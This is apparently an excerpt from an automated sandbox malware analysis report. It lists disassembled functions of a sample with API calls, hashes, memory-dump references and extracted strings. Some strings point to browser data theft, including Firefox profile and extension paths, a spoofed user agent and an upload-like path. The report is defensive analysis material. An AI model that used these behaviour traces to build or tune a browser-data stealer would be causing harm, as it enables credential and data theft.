                                                                                                                                                                                            • Opcode ID: aadda81f21d7cad1308c4d4f96de31a5bdc2a1224e2671bf4d38bc58ae2310b4
                                                                                                                                                                                            • Instruction ID: 8a7bed147888e05b17882e7ceae581f98556214eb20d575990a07190e72f9701
                                                                                                                                                                                            • Opcode Fuzzy Hash: aadda81f21d7cad1308c4d4f96de31a5bdc2a1224e2671bf4d38bc58ae2310b4
                                                                                                                                                                                            • Instruction Fuzzy Hash: 02317EB0D24309EBDF08EFA4C596AAEBB75AF14300F50416EE405A72C2DB745A55CF91
                                                                                                                                                                                            Function 0022C180 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,07CD655B,00000000,?,00000000,00245794,000000FF,?,0022C15C,?,?,0022C130,00000000), ref: 0022C1B5
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0022C1C7
                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000000,00245794,000000FF,?,0022C15C,?,?,0022C130,00000000), ref: 0022C1E9
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                            • Opcode ID: 6425fc3b78b7ef95ef906f4ebfae4845cfb8f4d5cf155e0ba5c04886c85c84d6
                                                                                                                                                                                            • Instruction ID: 91cbcfdaf5b9a1004e3657b6e6ba39b60b645c0ac93631cdf573179808f7a7ae
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6425fc3b78b7ef95ef906f4ebfae4845cfb8f4d5cf155e0ba5c04886c85c84d6
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3601D675910625FFDB158F90EC0EFAEBBB8FB06B11F000525F819E22D1DBB59910CA90
                                                                                                                                                                                            Function 00235285 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 0023530A
                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 002353D3
                                                                                                                                                                                            • __freea.LIBCMT ref: 0023543A
                                                                                                                                                                                              • Part of subcall function 0023188C: RtlAllocateHeap.NTDLL(00000000,?,?,?,002014D8,00000000,?), ref: 002318BE
                                                                                                                                                                                            • __freea.LIBCMT ref: 0023544D
                                                                                                                                                                                            • __freea.LIBCMT ref: 0023545A
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1423051803-0
                                                                                                                                                                                            • Opcode ID: 31b5650e1311b702b5777cad020ce7d806a9dbc060eb475b76f99f5e945617ab
                                                                                                                                                                                            • Instruction ID: 61f51eeb516ea6581093bfcb477128af792cab49e1f125a7b83d4a54f3861cbc
                                                                                                                                                                                            • Opcode Fuzzy Hash: 31b5650e1311b702b5777cad020ce7d806a9dbc060eb475b76f99f5e945617ab
                                                                                                                                                                                            • Instruction Fuzzy Hash: C451B3F2620626AFEB245EA4CD45EBB76A9EF44751F154428FE0CD6111E770DCB0CAA0
                                                                                                                                                                                            Function 0021B637 Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0021B63E
                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0021B64B
                                                                                                                                                                                              • Part of subcall function 0021A4EA: __EH_prolog3_GS.LIBCMT ref: 0021A4F1
                                                                                                                                                                                              • Part of subcall function 0021A4EA: std::_Lockit::_Lockit.LIBCPMT ref: 0021A502
                                                                                                                                                                                              • Part of subcall function 0021A4EA: std::_Lockit::~_Lockit.LIBCPMT ref: 0021A524
                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0021B69E
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0021B6C8
                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 0021B6D5
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: std::_$Lockit$H_prolog3_Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2687776920-0
                                                                                                                                                                                            • Opcode ID: f31b8ac27a845d60565e579e759872fdce265b1f296a494c8957dbb4e2bafa34
                                                                                                                                                                                            • Instruction ID: 5ce1d2ea340ef412a2417eed0f8f5d31918ed7ee56ff8e1f9790bceddf3c1d00
                                                                                                                                                                                            • Opcode Fuzzy Hash: f31b8ac27a845d60565e579e759872fdce265b1f296a494c8957dbb4e2bafa34
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7021F13192120ACFCB16EF78D4916EEB7F5AF64320F20451EE455E72A1DB748DA18F80
                                                                                                                                                                                            Function 0021C3F2 Relevance: 7.6, APIs: 5, Instructions: 65COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0021C3F9
                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0021C406
                                                                                                                                                                                              • Part of subcall function 0021A4EA: __EH_prolog3_GS.LIBCMT ref: 0021A4F1
                                                                                                                                                                                              • Part of subcall function 0021A4EA: std::_Lockit::_Lockit.LIBCPMT ref: 0021A502
                                                                                                                                                                                              • Part of subcall function 0021A4EA: std::_Lockit::~_Lockit.LIBCPMT ref: 0021A524
                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0021C459
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0021C483
                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 0021C490
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: std::_$Lockit$H_prolog3_Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2687776920-0
                                                                                                                                                                                            • Opcode ID: 4eb7157c2f18773c515694c01d459b04f61893c2651f5910dc44a362611c9a5b
                                                                                                                                                                                            • Instruction ID: 68fa4b5c29b8517e7b445baec38453e4c5970b6a5d07033b64665c927c98adc1
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4eb7157c2f18773c515694c01d459b04f61893c2651f5910dc44a362611c9a5b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8711E031D65219CBCB05EFA494956FEB7F5AF68310F60001AE411A7291CB748E928F96
                                                                                                                                                                                            Function 0021DE24 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0021DE2B
                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0021DE36
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0021DEA4
                                                                                                                                                                                              • Part of subcall function 0021DF87: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0021DF9F
                                                                                                                                                                                            • std::locale::_Setgloballocale.LIBCPMT ref: 0021DE51
                                                                                                                                                                                            • _Yarn.LIBCPMT ref: 0021DE67
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1088826258-0
                                                                                                                                                                                            • Opcode ID: 6a5630e910d7e62a9a2df5ad3f36b0625ec5d0d3707d73e784d9884a9200e4df
                                                                                                                                                                                            • Instruction ID: 16a0dba255bef1ff6ea64a6f70084e4f3c1d0137165387bfbc6df0ef618d5673
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a5630e910d7e62a9a2df5ad3f36b0625ec5d0d3707d73e784d9884a9200e4df
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A01F775A10211DBCB05EF20E8495BD77B5BFA1741B19011AE8065B382CF749E62CFC6
                                                                                                                                                                                            Function 002095B2 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 264sleepCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 002095BC
                                                                                                                                                                                              • Part of subcall function 0020B3E8: __EH_prolog3.LIBCMT ref: 0020B3EF
                                                                                                                                                                                              • Part of subcall function 0020B4BA: __EH_prolog3.LIBCMT ref: 0020B4C1
                                                                                                                                                                                              • Part of subcall function 0020B64E: __EH_prolog3.LIBCMT ref: 0020B655
                                                                                                                                                                                              • Part of subcall function 00209983: __EH_prolog3_GS.LIBCMT ref: 0020998D
                                                                                                                                                                                              • Part of subcall function 00206B3E: __EH_prolog3_GS.LIBCMT ref: 00206B48
                                                                                                                                                                                              • Part of subcall function 00206B3E: lstrlenA.KERNEL32(?,?), ref: 00206C2D
                                                                                                                                                                                              • Part of subcall function 00206B3E: GetProcessHeap.KERNEL32 ref: 00206C6A
                                                                                                                                                                                              • Part of subcall function 0020B51E: __EH_prolog3.LIBCMT ref: 0020B525
                                                                                                                                                                                              • Part of subcall function 0020B614: __EH_prolog3.LIBCMT ref: 0020B61B
                                                                                                                                                                                            • Sleep.KERNEL32(00000BB8), ref: 0020990F
                                                                                                                                                                                              • Part of subcall function 00208D6A: __EH_prolog3_GS.LIBCMT ref: 00208D74
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: H_prolog3$H_prolog3_$HeapProcessSleeplstrlen
                                                                                                                                                                                            • String ID: /Up/b$Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603
                                                                                                                                                                                            • API String ID: 3276473106-2390619756
                                                                                                                                                                                            • Opcode ID: b3ea1ea0551af013f7ba876686765cbfc427b51f873230624648a7208d55ff1d
                                                                                                                                                                                            • Instruction ID: 12f629c46b87c6f996b10a1220bd1d041a34a5b79ea60b62d5b4d4eb639003d5
                                                                                                                                                                                            • Opcode Fuzzy Hash: b3ea1ea0551af013f7ba876686765cbfc427b51f873230624648a7208d55ff1d
                                                                                                                                                                                            • Instruction Fuzzy Hash: BEA1DD319203589BDB19EB60C855AEDBB75AF46310F5481AAE40AA32D3DF305FA9CF50
                                                                                                                                                                                            Function 00207FA3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 216COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 00207FAD
                                                                                                                                                                                              • Part of subcall function 0020B4BA: __EH_prolog3.LIBCMT ref: 0020B4C1
                                                                                                                                                                                              • Part of subcall function 00207DEC: __EH_prolog3_GS.LIBCMT ref: 00207DF3
                                                                                                                                                                                              • Part of subcall function 00207DEC: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00207FEA), ref: 00207E40
                                                                                                                                                                                              • Part of subcall function 00207DEC: HeapFree.KERNEL32(00000000,?,?,?,?,?,00207FEA), ref: 00207E47
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: H_prolog3_Heap$FreeH_prolog3Process
                                                                                                                                                                                            • String ID: \Ext\$\prefs.js$\storage\default\
                                                                                                                                                                                            • API String ID: 4110124055-721971596
                                                                                                                                                                                            • Opcode ID: c1a3f0c1985c4b387e46c9602fec31a0a6fd31d8bdaffb365c8fa7dfc104342b
                                                                                                                                                                                            • Instruction ID: f0d219b8109405ae28f82e62605ab29580626919a137fcbc9decce28d3e4c0af
                                                                                                                                                                                            • Opcode Fuzzy Hash: c1a3f0c1985c4b387e46c9602fec31a0a6fd31d8bdaffb365c8fa7dfc104342b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 93918A30D24388AADB15EBA4C956BEDBBB0AF15300F8040A9E545A71D3DF741F99CF52
                                                                                                                                                                                            Function 00207DEC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 144memoryCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 00207DF3
                                                                                                                                                                                              • Part of subcall function 0021AE24: __EH_prolog3_GS.LIBCMT ref: 0021AE2E
                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00207FEA), ref: 00207E40
                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,00207FEA), ref: 00207E47
                                                                                                                                                                                              • Part of subcall function 0020A6BD: __EH_prolog3.LIBCMT ref: 0020A6C4
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • user_pref("extensions.webextensions.uuids", ", xrefs: 00207E5D
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: H_prolog3_Heap$FreeH_prolog3Process
                                                                                                                                                                                            • String ID: user_pref("extensions.webextensions.uuids", "
                                                                                                                                                                                            • API String ID: 4110124055-3221024688
                                                                                                                                                                                            • Opcode ID: 02f8deaddc7aed7150535c45a7679d4da34ea1041be752d0be122329b87a69e7
                                                                                                                                                                                            • Instruction ID: f2018883e402b4b7a839993c108b872791b1d8fc7a5e16dd4fa452be3ea73bdc
                                                                                                                                                                                            • Opcode Fuzzy Hash: 02f8deaddc7aed7150535c45a7679d4da34ea1041be752d0be122329b87a69e7
                                                                                                                                                                                            • Instruction Fuzzy Hash: 01518E71D25309DBCF11DBA8C949BEEBBB4AF19300F608019E511B72C2D7746A59CBA2
                                                                                                                                                                                            Function 00209983 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 62COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0020998D
                                                                                                                                                                                              • Part of subcall function 0021C2B7: __EH_prolog3_GS.LIBCMT ref: 0021C2C1
                                                                                                                                                                                              • Part of subcall function 0021C0F0: __EH_prolog3_catch_GS.LIBCMT ref: 0021C0F7
                                                                                                                                                                                              • Part of subcall function 0021ABF2: __EH_prolog3_GS.LIBCMT ref: 0021ABF9
                                                                                                                                                                                              • Part of subcall function 0021ABF2: ctype.LIBCPMT ref: 0021ACB5
                                                                                                                                                                                              • Part of subcall function 0020B7BF: __EH_prolog3.LIBCMT ref: 0020B7C6
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: H_prolog3_$H_prolog3H_prolog3_catch_ctype
                                                                                                                                                                                            • String ID: 17586936307509717578$@$ntdll.dll
                                                                                                                                                                                            • API String ID: 2848298560-3853183820
                                                                                                                                                                                            • Opcode ID: 2c55c164a3048108d55ae66f4a68f67d37ec0ec9fab2f5d76263df35c0595eef
                                                                                                                                                                                            • Instruction ID: d8a3a64554d0649f2e7438b8225ce3ac762d25a5ea5a20793c4029d79c9b7b98
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2c55c164a3048108d55ae66f4a68f67d37ec0ec9fab2f5d76263df35c0595eef
                                                                                                                                                                                            • Instruction Fuzzy Hash: 182137B1D113589BCB10EFE8C946ACDBBF4AF08310F54412AE504BB282DB705A54CFA1
                                                                                                                                                                                            Function 00223537 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,002234E8,00000000,?,0025A8FC,?,?,?,0022368B,00000004,InitializeCriticalSectionEx,00248594,InitializeCriticalSectionEx), ref: 00223544
                                                                                                                                                                                            • GetLastError.KERNEL32(?,002234E8,00000000,?,0025A8FC,?,?,?,0022368B,00000004,InitializeCriticalSectionEx,00248594,InitializeCriticalSectionEx,00000000,?,002232D2), ref: 0022354E
                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00223576
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                            • API String ID: 3177248105-2084034818
                                                                                                                                                                                            • Opcode ID: f9c1b6ae7f07e0f0d3ce7193361d6e0c4173d289ea825f84794450f558ae6c85
                                                                                                                                                                                            • Instruction ID: 1de4e275bb2bd8cfb7cd9d354800b53bce80d4ec24cd10c0507558a0ea127076
                                                                                                                                                                                            • Opcode Fuzzy Hash: f9c1b6ae7f07e0f0d3ce7193361d6e0c4173d289ea825f84794450f558ae6c85
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8FE04F30A90319BBEF215FE1FD0EB983E55AB16F51F504430F90DE80E1EBA59A709985
                                                                                                                                                                                            Function 00230338 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetConsoleOutputCP.KERNEL32(07CD655B,00000000,00000000,?), ref: 0023039B
                                                                                                                                                                                              • Part of subcall function 0023657C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00235430,?,00000000,-00000008), ref: 002365DD
                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 002305ED
                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00230633
                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 002306D6
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2112829910-0
                                                                                                                                                                                            • Opcode ID: bb94a78d302e4d25880b2a376739ff1a3bd8ab7df5a2eecc79700367737a0d29
                                                                                                                                                                                            • Instruction ID: 95584e8af2b0e65120fd261481cc51c5386ed224498c8acc9047b15bad91bb18
                                                                                                                                                                                            • Opcode Fuzzy Hash: bb94a78d302e4d25880b2a376739ff1a3bd8ab7df5a2eecc79700367737a0d29
                                                                                                                                                                                            • Instruction Fuzzy Hash: 35D19AB5D102489FCF14CFA8D8D5AADBBB8FF49300F24412AE516EB351D630A962CF60
                                                                                                                                                                                            Function 002224E1 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AdjustPointer
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1740715915-0
                                                                                                                                                                                            • Opcode ID: 6534820fa6556f6f3a25b692f8552bf494a720ad14578795e66a1f0413a74791
                                                                                                                                                                                            • Instruction ID: b3bd3ebbbe068a993ca5df094447a79f285491cad26f91db325e71cf6e4d1382
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6534820fa6556f6f3a25b692f8552bf494a720ad14578795e66a1f0413a74791
